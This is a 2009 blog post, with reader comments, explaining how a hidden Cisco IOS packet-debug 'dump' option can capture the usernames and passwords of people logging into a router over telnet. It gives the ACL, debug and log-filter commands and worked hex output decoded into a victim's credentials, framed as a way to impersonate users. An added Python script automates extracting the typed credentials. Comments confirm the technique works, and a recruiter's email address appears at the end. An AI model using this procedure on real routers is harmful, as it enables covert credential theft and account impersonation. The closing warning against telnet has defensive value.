Thursday, March 19, 2009

Decoding telnet passwords using a hidden debug

While messing with packet capture, I found an interesting feature, well hidden inside IOS.

Almost all of you should probably know the command "debug ip packet detail" which displays details about process switched (received/generated/forwarded) packets. There is a hidden option "dump" that provides extra information including raw packet data in hexadecimal and ASCII forms. According to Cisco, "the dump keyword is not fully supported and should be used only in collaboration with Cisco Technical Support. Because of the risk of using significant CPU utilization, the dump keyword is hidden from the user and cannot be seen using the "?" prompt."

What makes this command nasty-interesting is that you can capture the credentials of anyone logging into the router through an unencrypted protocol such as telnet (packets destined to the router itself are always process switched) and then impersonate that user. Other debug commands (e.g. aaa auth, tacacs, radius) hide the password field in their output.

First of all, you have to create an ACL that matches the source of the victim and the telnet destination port. This is not mandatory, but it'll help you keep the logs to a minimum.

access-list 111 permit tcp host x.x.x.x any eq telnet

If you don't know the source IP, you can simply use "any".

access-list 111 permit tcp any any eq telnet

Then you have to enable detailed IP packet debugging for the above ACL and wait for the victim to log in.

router#debug ip packet detail 111 ?
<cr>

router#debug ip packet detail 111 dump
IP packet debugging is on (detailed) (dump) for access list 111

After the victim has successfully logged in, you can use the following regexp to pull out the log lines needed to decode the credentials:

router#sh log | i ^.+: .+ .+ ....0000 [0-9|A-F]+ .+
07B131A0: 00000000 60022238 919B0000 020405B4 ....`."8.......4
07B15D60: 2932EDFC 50182238 35A80000 FFFD03FF )2m|P."85(...}..
07B3F660: 2932EE08 50182238 95610000 FFFD01FF )2n.P."8.a...}..
07B09CE0: 2932EE63 50182238 D4D40000 FFFA1800 )2ncP."8TT...z..
07B1BDA0: 2932EE66 50182238 1B740000 76 )2nfP."8.t..v
07AFD3A0: 2932EE67 50182238 28720000 69 )2ngP."8(r..i
07B203A0: 2932EE68 50182238 2E700000 63 )2nhP."8.p..c
07B0FD20: 2932EE69 50182238 1D6E0000 74 )2niP."8.n..t
07B1FAE0: 2932EE6A 50182238 286C0000 69 )2njP."8(l..i
07B19AA0: 2932EE6B 50182238 246A0000 6D )2nkP."8$j..m
07B27560: 2932EE6C 50182238 84670000 0D00 )2nlP."8.g....
07B263E0: 2932EE78 50182238 285A0000 69 )2nxP."8(Z..i
07B1C660: 2932EE78 50182238 50590000 41 )2nxP."8PY..A
07B02260: 2932EE78 50182238 44580000 4D )2nxP."8DX..M
07B2A9E0: 2932EE78 50182238 1D570000 74 )2nxP."8.W..t
07B22F60: 2932EE78 50182238 29560000 68 )2nxP."8)V..h
07B26CA0: 2932EE78 50182238 2C550000 65 )2nxP."8,U..e
07B2F8A0: 2932EE78 50182238 3F540000 52 )2nxP."8?T..R
07B312E0: 2932EE78 50182238 22530000 6F )2nxP."8"S..o
07B2B2A0: 2932EE78 50182238 22520000 6F )2nxP."8"R..o
07B33EA0: 2932EE78 50182238 22510000 6F )2nxP."8"Q..o
07AFB960: 2932EE78 50182238 89500000 08 )2nxP."8.P...
07B20C60: 2932EE78 50182238 894F0000 08 )2nxP."8.O...
07B2BB60: 2932EE78 50182238 894E0000 08 )2nxP."8.N...
07B34760: 2932EE78 50182238 424D0000 4F )2nxP."8BM..O
07B226A0: 2932EE78 50182238 424C0000 4F )2nxP."8BL..O
07B3DC20: 2932EE78 50182238 3D4B0000 54 )2nxP."8=K..T
07B4E2A0: 2932EE78 50182238 84490000 0D00 )2nxP."8.I....

You're mostly interested in the last hex column (the telnet data is at the end of the packet), and you can safely ignore everything that looks abnormal (like FF). Looking at the ASCII table, hex 0D translates to CR (carriage return) and hex 08 translates to BS (backspace). So the ASCII character stream of the last hex column is:

v
i
c
t
i
m
CR (CarriageReturn) - "Enter" is pressed
i
A
M
t
h
e
R
o
o
o
BS (BackSpace) - 1st "o" is deleted
BS (BackSpace) - 2nd "o" is deleted
BS (BackSpace) - 3rd "o" is deleted
O
O
O
T
CR (CarriageReturn) - "Enter" is pressed

which translates to username "victim" and password "iAMtheROOT".

Keep in mind that you might see more characters on the same line if the user types quickly. If you see a full 4-byte word of data, you'll have to check manually whether the rest of the data continues on the next line (same address plus 0x10). You're always looking for 0D00 to find the end of each input.

router#sh log | i ^.+: .+ .+ ....0000 [0-9|A-F]+ .+
07B1D7E0: 05DE7766 50182238 219F0000 FFFD03FF .^wfP."8!....}..
07B079E0: 05DE7772 50182238 81580000 FFFD01FF .^wrP."8.X...}..
07B16EE0: 05DE77C7 50182238 BCF80000 FFFA1800 .^wGP."8<x...z..
07B14320: 05DE77CD 50182238 59730000 FFFB24 .^wMP."8Ys...{$
07B25B20: 05DE77D0 50182238 3A1B0000 76696374 .^wPP."8:...vict
07B588E0: 05DE77D6 50182238 705E0000 0D00 .^wVP."8p^....
07B45F60: 05DE77E2 50182238 BC890000 69414D74 .^wbP."8<...iAMt
07B2E720: 05DE77E2 50182238 70460000 0D00 .^wbP."8pF....

router#sh log | b 07B25B20
07B25B20: 05DE77D0 50182238 3A1B0000 76696374 .^wPP."8:...vict
07B25B30: 696D im

router#sh log | b 07B45F60
07B45F60: 05DE77E2 50182238 BC890000 69414D74 .^wbP."8<...iAMt
07B45F70: 6865524F 4F54 heROOT


Notes:

1. A Tcl script could probably decode the above debug output much more easily.

2. You can also include other IPs (e.g. the AAA server) in your ACL to watch the whole login process, probably more easily (look for the Username/Password strings), because the packet data contains everything the user types.

3. The beginning of a packet may start at different locations in the dump output depending on the specific router, interface type, and packet header processing that may have occurred before the output is displayed.

4. The length of the displayed packet information may exceed the actual packet length and include additional padding bytes that do not belong to the actual IP packet.
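Note 1 above suggests scripting the decode. Below is such a script in Python, added here as an example; it is not code from the post, nor anything Cisco ships. It automates the two hand decodes above: it parses the dump rows, joins a continuation row (the address 0x10 higher that `sh log | b` showed) onto its packet, extracts the TCP data, drops the telnet option negotiation (the FF bytes the post calls abnormal are the telnet IAC byte) and replays CR and BS as a line editor would. It goes one step beyond the post: when the rows hold a whole packet, as in the dumps posted in the comments below, it parses the IPv4 and TCP headers instead of relying on the post's `....0000` rule, which is kept only as a fallback for rows filtered with `sh log | i`. The sample rows are the post's second capture with the continuation rows put back in log order, plus one packet from the comment thread; DEL (0x7F) as a second erase key is my assumption.

```python
import re

# One dump row: 8-digit hex address, colon, up to four 4-byte words, then the ASCII column
# (assumption: that column never starts with a token that looks like an even-length hex word).
ROW_RE = re.compile(r"^([0-9A-F]{8}):((?:\s+(?:[0-9A-F]{2}){1,4})*)")


def packets(text: str) -> list[bytes]:
    """Group rows into packets: a row at the previous address + 0x10 continues the previous
    packet (the rows `sh log | b` revealed above); any other address starts a new packet."""
    pkts, prev = [], None
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        addr, raw = int(m.group(1), 16), bytes.fromhex(m.group(2))
        if prev is not None and addr == prev + 0x10:
            pkts[-1] += raw
        else:
            pkts.append(raw)
        prev = addr
    return pkts


def tcp_payload(pkt: bytes) -> bytes:
    """TCP data of one packet: a real IPv4/TCP parse when the headers are present (IP header at any
    offset, note 3; IP total length bounds trailing padding, note 4), otherwise the post's rule for
    `| i`-filtered rows: data follows the first word ending in 0000 right after a flags word with ACK."""
    for i in range(max(0, len(pkt) - 19)):
        if pkt[i] >> 4 != 4 or pkt[i + 9] != 6:           # IPv4 carrying protocol 6 (TCP)
            continue
        ihl = (pkt[i] & 0xF) * 4
        total = int.from_bytes(pkt[i + 2:i + 4], "big")
        if ihl < 20 or total < ihl + 20 or i + total > len(pkt):
            continue
        doff = (pkt[i + ihl + 12] >> 4) * 4                # TCP data offset
        return pkt[i + ihl + doff:i + total]
    for k in range(1, len(pkt) // 4):
        flags, word = pkt[4 * k - 4:4 * k], pkt[4 * k:4 * k + 4]
        if word[2:] == b"\x00\x00" and flags[0] >> 4 >= 5 and flags[1] & 0x10:
            return pkt[4 * k + 4:]
    return b""


def strip_telnet(payload: bytes) -> bytes:
    """Drop telnet option negotiation (FF is IAC): IAC WILL/WONT/DO/DONT x and IAC SB ... IAC SE."""
    out, i = bytearray(), 0
    while i < len(payload):
        nxt = payload[i + 1:i + 2]
        if payload[i] != 0xFF:
            out.append(payload[i])
            i += 1
        elif nxt == b"\xff":                                # escaped IAC IAC is a literal 0xFF
            out.append(0xFF)
            i += 2
        elif nxt == b"\xfa":                                # SB: skip to IAC SE, or to the end if the row was cut off
            end = payload.find(b"\xff\xf0", i + 2)
            i = len(payload) if end < 0 else end + 2
        elif nxt in (b"\xfb", b"\xfc", b"\xfd", b"\xfe"):   # WILL/WONT/DO/DONT + option byte
            i += 3
        else:                                               # other IAC commands, or a cut-off IAC
            i += 2
    return bytes(out)


def keystrokes_to_lines(stream: bytes) -> list[str]:
    """Replay the stream as a line editor: CR ends a line, BS erases the previous character (DEL,
    0x7F, is my assumption; the post shows only 0x08); NUL, LF and other control bytes are dropped."""
    lines, cur = [], []
    for b in stream:
        if b == 0x0D:
            lines.append("".join(cur))
            cur = []
        elif b in (0x08, 0x7F) and cur:
            cur.pop()
        elif 0x20 <= b < 0x7F:
            cur.append(chr(b))
    return lines + (["".join(cur)] if cur else [])


def decode_dump(text: str) -> list[str]:
    """Everything typed on the session, one entry per line the user ended with Enter."""
    return keystrokes_to_lines(b"".join(strip_telnet(tcp_payload(p)) for p in packets(text)))


# Rows from the post's second capture, continuation rows from `sh log | b` put back in log order.
POST_ROWS = """\
07B1D7E0: 05DE7766 50182238 219F0000 FFFD03FF .^wfP."8!....}..
07B16EE0: 05DE77C7 50182238 BCF80000 FFFA1800 .^wGP."8<x...z..
07B14320: 05DE77CD 50182238 59730000 FFFB24 .^wMP."8Ys...{$
07B25B20: 05DE77D0 50182238 3A1B0000 76696374 .^wPP."8:...vict
07B25B30: 696D im
07B588E0: 05DE77D6 50182238 705E0000 0D00 .^wVP."8p^....
07B45F60: 05DE77E2 50182238 BC890000 69414D74 .^wbP."8<...iAMt
07B45F70: 6865524F 4F54 heROOT
07B2E720: 05DE77E2 50182238 70460000 0D00 .^wbP."8pF....
"""
# One whole packet (Ethernet type, IPv4 and TCP headers included) from the comment thread below.
COMMENT_ROWS = """\
07A00D50: 18F10800 45C00029 BE360000 .q..E@.)>6..
07A00D60: FE067A24 C0A80132 C0A80131 6D830017 ~.z$@(.2@(.1m...
07A00D70: 5814FDC2 449B17AF 50180FAB 84B00000 X.}BD../P..+.0..
07A00D80: 78 x
"""

if __name__ == "__main__":
    print(decode_dump(POST_ROWS), decode_dump(COMMENT_ROWS))   # ['victim', 'iAMtheROOT'] ['x']
```

Run as a script it prints the two decoded lists. The fallback is a heuristic, just as the post's regexp is: a sequence or acknowledgement number that happens to end in 0000 behind an ACK-flag word would be mistaken for the checksum word, which is why the full-packet parse is tried first, and why it helps to leave the dump unfiltered and large enough (the comment thread found a too-small logging buffer) so that each packet's headers survive.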


So, next time you decide to use telnet to log in to a router, you'd better think twice before doing so. Besides sniffing on the wire, someone can sniff on the router itself too.

6 comments:

  1. Awesome!! Hehe.. I'll try this out for sure.. :P
    Thanks mate.

  2. Hi! Just tried it out on a C3640-JK9O3S-M IOS and it looks like it doesn't dump a decipherable hex log. Followed every step and this is how the buffer looks:

    R1#sh log | i ^........:
    07B6CA60: 65 e
    07B6D930: 18F10800 45C00028 BE350000 .q..E@.(>5..
    07B6D940: FE067A26 C0A80132 C0A80131 6D830017 ~.z&@(.2@(.1m...
    07B6D950: 5814FDC2 449B17AF 50100FAB FCB90000 X.}BD../P..+|9..
    07B6D960:
    07A00D50: 18F10800 45C00029 BE360000 .q..E@.)>6..
    07A00D60: FE067A24 C0A80132 C0A80131 6D830017 ~.z$@(.2@(.1m...
    07A00D70: 5814FDC2 449B17AF 50180FAB 84B00000 X.}BD../P..+.0..
    07A00D80: 78 x
    07A00C10: 18F10800 45C00029 BE370000 .q..E@.)>7..
    07A00C20: FE067A23 C0A80132 C0A80131 6D830017 ~.z#@(.2@(.1m...
    07A00C30: 5814FDC3 449B17B0 50180FAA 93AF0000 X.}CD..0P..*./..
    07A00C40: 69 i
    07B6DA70: 18F10800 45C00029 BE380000 .q..E@.)>8..
    07B6DA80: FE067A22 C0A80132 C0A80131 6D830017 ~.z"@(.2@(.1m...
    07B6DA90: 5814FDC4 449B17B1 50180FA9 88AE0000 X.}DD..1P..)....
    07B6DAA0: 74 t
    07B6CF30: 18F10800 45C0002A BE390000 .q..E@.*>9..
    07B6CF40: FE067A20 C0A80132 C0A80131 6D830017 ~.z @(.2@(.1m...
    07B6CF50: 5814FDC5 449B17B2 50180FA8 EFA20000 X.}ED..2P..(o"..
    07B6CF60: 0D0A ..
    07B6CCB0: 18F10800 45C00028 BE3A0000 .q..E@.(>:..
    07B6CCC0: FE067A21 C0A80132 C0A80131 6D830017 ~.z!@(.2@(.1m...
    07B6CCD0: 5814FDC7 449B17BB 50100FA0 FCB30000 X.}GD..;P.. |3..
    07B6CCE0:
    07B6DBB0: 18F10800 45C00028 BE3B0000 .q..E@.(>;..
    07B6DBC0: FE067A20 C0A80132 C0A80131 6D830017 ~.z @(.2@(.1m...
    07B6DBD0: 5814FDC7 449B17BB 50190FA0 FCAA0000 X.}GD..;P.. |*..
    07B6DBE0:
    R1#

    Any clues?

  3. Duuh! Looks like I had a small buffer size. Increased the buffer and now I'm able to see everything. Works like a charm.

  4. Ha, nice! Very clever, well done!

  5. Great, tested it, it's working for me.

  6. Hey I was wondering if you could refer someone (or if you yourself might be interested) for a position I have available in Milwaukee WI for a certified CCIE (written & lab, must have #). This is an immediate need and we're looking for a full-time hire. Please get back to me, I can be reached at gblackman@visiongroupllc.com. Thanks.

    Best Regards,

    Gavin Blackman
    Managing Partner / Recruiting
    Vision Group Associates, LLC
    gblackman@visiongroupllc.com

This work is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License.
This work is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 Greece License.